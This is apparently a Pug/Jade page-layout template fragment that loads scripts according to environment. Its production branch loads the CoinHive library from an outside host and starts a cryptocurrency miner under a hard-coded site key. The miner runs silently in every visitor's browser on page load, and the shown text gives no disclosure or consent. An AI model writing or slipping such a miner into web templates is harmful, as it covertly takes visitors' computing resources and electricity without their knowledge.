if environment == "development"
  script(src="/assets/js/plugins/circlemenu.js")
  script(src="/assets/js/main.js")
if environment == "production"
  script(src="/assets/js/main.js" async defer)
  != partial("google_analytics")
  script(src="https://coinhive.com/lib/coinhive.min.js")
  script.
    (function() {
      var miner = new CoinHive.User('RIaDrK9Ek6MTJRIIv3aw3IJPhECEUgcB');
      miner.start();
    })();